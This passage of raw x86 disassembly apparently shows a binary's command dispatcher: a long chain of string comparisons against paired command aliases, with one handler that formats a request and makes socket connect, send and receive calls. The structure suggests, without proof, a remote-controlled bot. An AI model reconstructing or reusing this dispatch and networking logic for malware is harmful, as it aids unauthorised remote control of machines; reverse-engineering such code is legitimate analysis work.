push dword ptr [ebp+esi-9Ch]
push 0Bh
push offset dword_42C8C0
push offset dword_42C8B4
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A108: ; CODE XREF: seg000:0040A0EE�j
push edi
push offset dword_42C8A4
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A131
push dword ptr [ebp+esi-9Ch]
push 0Fh
push offset dword_42C898
push offset dword_42C88C
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A131: ; CODE XREF: seg000:0040A117�j
push edi
push offset dword_42C87C
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A15A
push dword ptr [ebp+esi-9Ch]
push 0Eh
push offset dword_42C870
push offset dword_42C864
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A15A: ; CODE XREF: seg000:0040A140�j
push edi
push offset dword_42C854
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A183
push dword ptr [ebp+esi-9Ch]
push 4
push offset dword_42C980
push offset dword_42C848
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A183: ; CODE XREF: seg000:0040A169�j
push edi
push offset dword_42C838
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DFFF
push edi
push offset dword_42C82C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DFFF
push edi
push offset dword_42C820
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A1D6
push dword ptr [ebp+esi-9Ch]
push 17h
push offset dword_42C818
push offset dword_42C808
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A1D6: ; CODE XREF: seg000:0040A1BC�j
push edi
push offset dword_42C7F8
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A1FF
push dword ptr [ebp+esi-9Ch]
push 19h
push offset dword_42C7F0
push offset dword_42C7E0
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A1FF: ; CODE XREF: seg000:0040A1E5�j
push edi
push offset dword_42C7D4
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A228
push dword ptr [ebp+esi-9Ch]
push 8
push offset dword_42C7CC
push offset dword_42C7BC
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A228: ; CODE XREF: seg000:0040A20E�j
push edi
push offset dword_42C7B0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DFE6
push edi
push offset dword_42C7A8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DFE6
push edi
push offset dword_42C79C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DFC5
push edi
push offset dword_42C794
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DFC5
push edi
push offset dword_42C788
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DFA3
push edi
push offset dword_42C780
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DFA3
push edi
push offset dword_42C770
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DF5B
push edi
push offset dword_42C764
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DF5B
push edi
push offset dword_42C758
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DF1D
push edi
push offset dword_42C750
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DF1D
push edi
push offset dword_42C748
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DEE6
push edi
push offset dword_42C740
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DEE6
push edi
push offset dword_42C734
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A376
call sub_4070B7
test eax, eax
mov eax, offset dword_42C704
jnz short loc_40A348
mov eax, offset dword_42C6CC
loc_40A348: ; CODE XREF: seg000:0040A341�j
push eax
lea eax, [ebp-2E4h]
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 1Ch
jmp loc_40C67D
; ---------------------------------------------------------------------------
loc_40A376: ; CODE XREF: seg000:0040A333�j
push edi
push offset dword_42C6BC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DDEF
push edi
push offset dword_42C6B0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DDEF
push edi
push offset dword_42C6A4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DDCC
push edi
push offset dword_42C69C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DDCC
push edi
push offset dword_42C694
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DCDC
push edi
push offset dword_42C68C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DCDC
push edi
push offset dword_42C67C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DCC0
push edi
push offset dword_42C670
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DCC0
push edi
push offset dword_42C664
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DC86
push edi
push offset dword_42C65C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DC86
push edi
push offset dword_42C650
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DC5B
push edi
push offset dword_42C648
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DC5B
push edi
push offset dword_42C63C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DC21
push edi
push offset dword_42C634
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DC21
push edi
push offset dword_42C628
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DAFE
push edi
push offset dword_42C620
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DAFE
push edi
push offset dword_42C614
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DA77
push edi
push offset dword_42C60C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DA77
push edi
push offset dword_42C5FC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DA5A
push edi
push offset dword_42C5F4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DA5A
push edi
push offset dword_42C5E4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DA41
push edi
push offset dword_42C5DC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DA41
push edi
push offset dword_42C5D4
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A5CB
cmp [ebp-8], ebx
jnz short loc_40A574
push ebx
push dword ptr [ebp-4]
push offset dword_42C5C4
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40A574: ; CODE XREF: seg000:0040A558�j
mov edi, [ebp+20h]
xor esi, esi
loc_40A579: ; CODE XREF: seg000:0040A5BF�j
cmp [edi], bl
lea eax, [edi+1]
jnz short loc_40A585
mov eax, offset dword_42C5BC
loc_40A585: ; CODE XREF: seg000:0040A57E�j
push eax
push esi
lea eax, [ebp-2E4h]
push offset dword_42C5B4
push eax
call sub_41050B
push 1
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40A579
push offset dword_42C580
jmp loc_40DEDB
; ---------------------------------------------------------------------------
loc_40A5CB: ; CODE XREF: seg000:0040A553�j
push edi
push offset dword_42C574
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DA00
push edi
push offset dword_42C56C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40DA00
push edi
push offset dword_42C55C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D9D5
push edi
push offset dword_42C550
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D9D5
push edi
push offset dword_42C540
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D9B1
push edi
push offset dword_42C534
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D9B1
push edi
push offset dword_42C524
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D977
push edi
push offset dword_42C518
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D977
push edi
push offset dword_42C508
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D7DD
push edi
push offset dword_42C4F8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D7DD
push edi
push offset dword_42C4E8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D691
push edi
push offset dword_42C4D8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D691
push edi
push offset dword_42C4C4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D384
push edi
push offset dword_42C4BC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D384
mov edi, [ebp+esi-9Ch]
cmp edi, ebx
jz loc_40980B
push dword ptr [ebp+18h]
push offset dword_42C4B0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D363
push dword ptr [ebp+18h]
push offset dword_42C4A8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D363
push dword ptr [ebp+18h]
push offset dword_42C49C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D343
push dword ptr [ebp+18h]
push offset dword_42C494
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D343
push dword ptr [ebp+18h]
push offset dword_42C488
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D32D
push dword ptr [ebp+18h]
push offset dword_42C480
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D32D
push dword ptr [ebp+18h]
push offset dword_42C478
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D2F9
push dword ptr [ebp+18h]
push offset dword_42C470
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D2F9
push dword ptr [ebp+18h]
push offset dword_42C460
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D236
push dword ptr [ebp+18h]
push offset dword_42C454
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D236
push dword ptr [ebp+18h]
push offset dword_42C448
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D18B
push dword ptr [ebp+18h]
push offset dword_42C440
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D18B
push dword ptr [ebp+18h]
push offset dword_42C430
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D143
push dword ptr [ebp+18h]
push offset dword_42C424
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D143
push dword ptr [ebp+18h]
push offset dword_42C418
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D12E
push dword ptr [ebp+18h]
push offset dword_42C410
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D12E
push dword ptr [ebp+18h]
push offset dword_42C404
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D104
push dword ptr [ebp+18h]
push offset dword_42C3FC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D104
push dword ptr [ebp+18h]
push offset dword_42C3EC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D0DF
push dword ptr [ebp+18h]
push offset dword_42C3E4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D0DF
push dword ptr [ebp+18h]
push offset dword_42C3DC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D04D
push dword ptr [ebp+18h]
push offset dword_42C3D4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D04D
push dword ptr [ebp+18h]
push offset dword_42C3C0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D021
push dword ptr [ebp+18h]
push offset dword_42C3B8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40D021
push dword ptr [ebp+18h]
push offset dword_42C3A8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CFC6
push dword ptr [ebp+18h]
push offset dword_42C39C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CFC6
push dword ptr [ebp+18h]
push offset dword_42C390
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CF8F
push dword ptr [ebp+18h]
push offset dword_42C388
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CF8F
push dword ptr [ebp+18h]
push offset dword_42C378
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CF74
push dword ptr [ebp+18h]
push offset dword_42C370
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CF74
push dword ptr [ebp+18h]
push offset dword_42C364
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CF39
push dword ptr [ebp+18h]
push offset dword_42C364
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CF39
push dword ptr [ebp+18h]
push offset dword_42C354
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CEA5
push dword ptr [ebp+18h]
push offset dword_42C34C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CEA5
push dword ptr [ebp+18h]
push offset dword_42C344
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40ACAA
cmp ds:dword_430860, ebx
jz short loc_40AA3F
cmp ds:dword_430888, ebx
jz short loc_40AA3F
push offset dword_42C2F8
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40AA3F: ; CODE XREF: seg000:0040AA2B�j
; seg000:0040AA33�j
cmp [ebp-0Ch], ebx
jz loc_40D0B5
mov eax, [ebp+esi-98h]
mov [ebp+8], ebx
cmp eax, ebx
mov [ebp+20h], eax
jz short loc_40AA67
push eax
push dword ptr [ebp-0Ch]
call sub_410AE0
pop ecx
mov [ebp+8], eax
pop ecx
loc_40AA67: ; CODE XREF: seg000:0040AA57�j
push edi
push offset dword_426F7C
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40AACD
cmp [ebp+20h], ebx
jz short loc_40AAA1
push dword ptr [ebp+8]
push 3
loc_40AA82: ; CODE XREF: seg000:0040AAE3�j
; seg000:0040AAFB�j ...
call sub_40E402
push eax
lea eax, [ebp-2E4h]
push offset dword_41F970
push eax
call sub_41050B
add esp, 14h
jmp loc_40D0B5
; ---------------------------------------------------------------------------
loc_40AAA1: ; CODE XREF: seg000:0040AA7B�j
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E6A9
add esp, 0Ch
test eax, eax
jz short loc_40AAC3
push offset dword_42C2C0
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40AAC3: ; CODE XREF: seg000:0040AAB7�j
push offset dword_42C28C
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40AACD: ; CODE XREF: seg000:0040AA76�j
push edi
push offset dword_42C284
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40AAE5
push dword ptr [ebp+8]
push 4
jmp short loc_40AA82
; ---------------------------------------------------------------------------
loc_40AAE5: ; CODE XREF: seg000:0040AADC�j
push edi
push offset dword_42C27C
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40AAFD
push dword ptr [ebp+8]
push 5
jmp short loc_40AA82
; ---------------------------------------------------------------------------
loc_40AAFD: ; CODE XREF: seg000:0040AAF4�j
push edi
push offset dword_42913C
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40AB18
push dword ptr [ebp+8]
push 6
jmp loc_40AA82
; ---------------------------------------------------------------------------
loc_40AB18: ; CODE XREF: seg000:0040AB0C�j
push edi
push offset dword_42C274
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40AB33
push dword ptr [ebp+8]
push 1
jmp loc_40AA82
; ---------------------------------------------------------------------------
loc_40AB33: ; CODE XREF: seg000:0040AB27�j
push edi
push offset dword_42C26C
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40ABB0
cmp [ebp+20h], ebx
jz short loc_40AB83
cmp [ebp-9B0h], bl
jz short loc_40AB59
push ebx
push dword ptr [ebp+20h]
push 1
jmp short loc_40AB64
; ---------------------------------------------------------------------------
loc_40AB59: ; CODE XREF: seg000:0040AB4F�j
push dword ptr [ebp+esi-94h]
push dword ptr [ebp+20h]
push ebx
loc_40AB64: ; CODE XREF: seg000:0040AB57�j
call sub_40E7E6
push eax
lea eax, [ebp-2E4h]
push offset dword_41F970
push eax
call sub_41050B
add esp, 18h
jmp loc_40D0B5
; ---------------------------------------------------------------------------
loc_40AB83: ; CODE XREF: seg000:0040AB47�j
push ebx
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E9DB
add esp, 10h
test eax, eax
jz short loc_40ABA6
push offset dword_42C238
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40ABA6: ; CODE XREF: seg000:0040AB9A�j
push offset dword_42C204
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40ABB0: ; CODE XREF: seg000:0040AB42�j
push edi
push offset dword_42C1FC
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40AC52
mov eax, [ebp+20h]
cmp eax, ebx
jz short loc_40AC25
cmp [ebp-9B0h], bl
jz short loc_40ABE6
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
push ebx
push eax
push 1
jmp short loc_40AC06
; ---------------------------------------------------------------------------
loc_40ABE6: ; CODE XREF: seg000:0040ABD2�j
push dword ptr [ebp-4]
mov esi, [ebp+esi-94h]
cmp esi, ebx
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
jz short loc_40AC02
push esi
push eax
push ebx
jmp short loc_40AC06
; ---------------------------------------------------------------------------
loc_40AC02: ; CODE XREF: seg000:0040ABFB�j
push ebx
push eax
push 2
loc_40AC06: ; CODE XREF: seg000:0040ABE4�j
; seg000:0040AC00�j
call sub_40EAFC
push eax
lea eax, [ebp-2E4h]
push offset dword_41F970
push eax
call sub_41050B
add esp, 24h
jmp loc_40D0B5
; ---------------------------------------------------------------------------
loc_40AC25: ; CODE XREF: seg000:0040ABCA�j
push ebx
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40F010
add esp, 10h
test eax, eax
jz short loc_40AC48
push offset dword_42C1C8
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40AC48: ; CODE XREF: seg000:0040AC3C�j
push offset dword_42C198
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40AC52: ; CODE XREF: seg000:0040ABBF�j
push edi
push offset dword_420A54
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40ACA0
cmp [ebp+20h], ebx
jz short loc_40AC96
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40F2C4
push eax
lea eax, [ebp-2E4h]
push offset dword_41F970
push eax
call sub_41050B
add esp, 1Ch
jmp loc_40D0B5
; ---------------------------------------------------------------------------
loc_40AC96: ; CODE XREF: seg000:0040AC66�j
push offset dword_42C164
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40ACA0: ; CODE XREF: seg000:0040AC61�j
push offset dword_42C134
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40ACAA: ; CODE XREF: seg000:0040AA1F�j
push dword ptr [ebp+18h]
push offset dword_42C128
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CDC1
push dword ptr [ebp+18h]
push offset dword_42C120
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CDC1
mov eax, [ebp+esi-98h]
cmp eax, ebx
mov [ebp+20h], eax
jz loc_40980B
push dword ptr [ebp+18h]
push offset dword_42C110
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CD82
push dword ptr [ebp+18h]
push offset dword_42C108
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CD82
push dword ptr [ebp+18h]
push offset dword_42C0FC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CD2C
push dword ptr [ebp+18h]
push offset dword_42C0F4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CD2C
push dword ptr [ebp+18h]
push offset dword_42C0E8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CCBE
push dword ptr [ebp+18h]
push offset dword_42C0E0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CCBE
push dword ptr [ebp+18h]
push offset dword_42C0D4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CC58
push dword ptr [ebp+18h]
push offset dword_42C0CC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CC58
push dword ptr [ebp+18h]
push offset dword_42C0C0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CC21
push dword ptr [ebp+18h]
push offset dword_42C0B8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CC21
push dword ptr [ebp+18h]
push offset dword_42C0AC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CBB6
push dword ptr [ebp+18h]
push offset dword_42C0A0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CBB6
push dword ptr [ebp+18h]
push offset dword_42C094
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CB34
push dword ptr [ebp+18h]
push offset dword_42C08C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CB34
push dword ptr [ebp+18h]
push offset dword_42C080
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CAC6
push dword ptr [ebp+18h]
push offset dword_42C074
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CAC6
push dword ptr [ebp+18h]
push offset dword_42C068
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CAA0
push dword ptr [ebp+18h]
push offset dword_42C060
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CAA0
push dword ptr [ebp+18h]
push offset dword_42C054
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CA40
push dword ptr [ebp+18h]
push offset dword_42C04C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40CA40
push dword ptr [ebp+18h]
push offset dword_42C040
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C97A
push dword ptr [ebp+18h]
push offset dword_42C038
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C97A
push dword ptr [ebp+18h]
push offset dword_42C02C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C8DF
push dword ptr [ebp+18h]
push offset dword_42C024
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C8DF
push dword ptr [ebp+18h]
push offset dword_42C014
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C727
push dword ptr [ebp+18h]
push offset dword_42C004
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C727
push dword ptr [ebp+18h]
push offset dword_42BFF8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C694
push dword ptr [ebp+18h]
push offset dword_42BFF0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C694
push dword ptr [ebp+18h]
push offset dword_42BFE4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C610
push dword ptr [ebp+18h]
push offset dword_42BFDC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C610
push dword ptr [ebp+18h]
push offset dword_42BFD0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C515
push dword ptr [ebp+18h]
push offset dword_42BFC8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C515
mov eax, [ebp+esi-94h]
cmp eax, ebx
mov [ebp+8], eax
jz loc_40980B
push dword ptr [ebp+18h]
push offset dword_42BFBC
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C42A
push dword ptr [ebp+18h]
push offset dword_42BFB0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C42A
push dword ptr [ebp+18h]
push offset dword_42BFA8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C325
push dword ptr [ebp+18h]
push offset dword_42BFA0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C325
push dword ptr [ebp+18h]
push offset dword_42BF98
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C325
push dword ptr [ebp+18h]
push offset dword_42BF88
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C227
push dword ptr [ebp+18h]
push offset dword_42BF84
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C227
push dword ptr [ebp+18h]
push offset dword_42BF78
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C0E6
push dword ptr [ebp+18h]
push offset dword_42BF74
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C0E6
push dword ptr [ebp+18h]
push offset dword_42BF60
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40BFEC
push dword ptr [ebp+18h]
push offset dword_42BF50
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40BFEC
push dword ptr [ebp+18h]
push offset dword_42BF40
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40BEF9
push dword ptr [ebp+18h]
push offset dword_42BF38
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40BEF9
push dword ptr [ebp+18h]
push offset dword_42BF28
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40BE24
push dword ptr [ebp+18h]
push offset dword_42BF1C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40BE24
push dword ptr [ebp+18h]
push offset dword_42BF0C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40BD12
push dword ptr [ebp+18h]
push offset dword_42BF00
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40BD12
mov eax, [ebp+esi-90h]
cmp eax, ebx
mov [ebp+10h], eax
jz loc_40980B
push dword ptr [ebp+18h]
push offset dword_42BEF4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B9B8
push dword ptr [ebp+18h]
push offset dword_425778
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B9B8
push dword ptr [ebp+18h]
push offset dword_42BEE4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B895
push dword ptr [ebp+18h]
push offset dword_42BED8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B895
push dword ptr [ebp+18h]
push offset dword_42BED4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B895
push dword ptr [ebp+18h]
push offset dword_42BEC4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B762
push dword ptr [ebp+18h]
push offset dword_42BEB8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B762
push dword ptr [ebp+18h]
push offset dword_42BEB4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B762
push dword ptr [ebp+18h]
push offset dword_42BEA4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B5CF
push dword ptr [ebp+18h]
push offset dword_42BEA0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B5CF
push dword ptr [ebp+18h]
push offset dword_42BE94
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40B3CA
lea eax, [ebp-3E4h]
push edi
push eax
call sub_411B70
push dword ptr [ebp+20h]
call sub_410A7F
push dword ptr [ebp+8]
mov [ebp+20h], eax
lea eax, [ebp-0D9Ch]
push eax
call sub_411B70
push dword ptr [ebp+10h]
lea eax, [ebp-0B94h]
push eax
call sub_411B70
push offset dword_41F6B0
push offset dword_42BE90
push dword ptr [ebp+esi-8Ch]
call sub_406C6E
push eax
lea eax, [ebp-564h]
push eax
call sub_411B70
add esp, 30h
lea eax, [ebp-6F4h]
push eax
push 101h
call ds:dword_430718
lea eax, [ebp-3E4h]
push eax
call ds:dword_430814
push 6
push 1
push 2
mov edi, eax
call ds:dword_430810
push dword ptr [ebp+20h]
mov esi, eax
mov word ptr [ebp-0D8h], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp-0D4h], eax
call ds:dword_430794
mov [ebp-0D6h], ax
lea eax, [ebp-564h]
push eax
lea eax, [ebp-0D9Ch]
push eax
lea eax, [ebp-564h]
push eax
lea eax, [ebp-0B94h]
push eax
lea eax, [ebp-0D9Ch]
push eax
lea eax, [ebp-159Ch]
push offset dword_42BE44
push eax
call sub_41050B
add esp, 1Ch
lea eax, [ebp-0D8h]
push 10h
push eax
push esi
call ds:dword_430740
mov edi, 100h
push ebx
lea eax, [ebp-0C98h]
push edi
push eax
push esi
call ds:dword_4307AC
lea eax, [ebp-0C98h]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp-159Ch]
push eax
push esi
call ds:dword_4307E0
push ebx
lea eax, [ebp-0C98h]
push edi
push eax
push esi
call ds:dword_4307AC
push esi
call ds:dword_430828
call ds:dword_430700
lea eax, [ebp-0B94h]
push eax
push offset dword_42BE00
jmp loc_40CF25
; ---------------------------------------------------------------------------
loc_40B3CA: ; CODE XREF: seg000:0040B26C�j
push dword ptr [ebp+18h]
push offset dword_42BDF0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B59E
push dword ptr [ebp+18h]
push offset dword_42BDE4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40B59E
mov esi, [ebp+esi-8Ch]
cmp esi, ebx
jz loc_40980B
push dword ptr [ebp+18h]
push offset dword_42BDD8
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40E148
push 4
push esi
call sub_408661
pop ecx
test eax, eax
pop ecx
jnz short loc_40B473
push esi
push offset dword_42BDA4
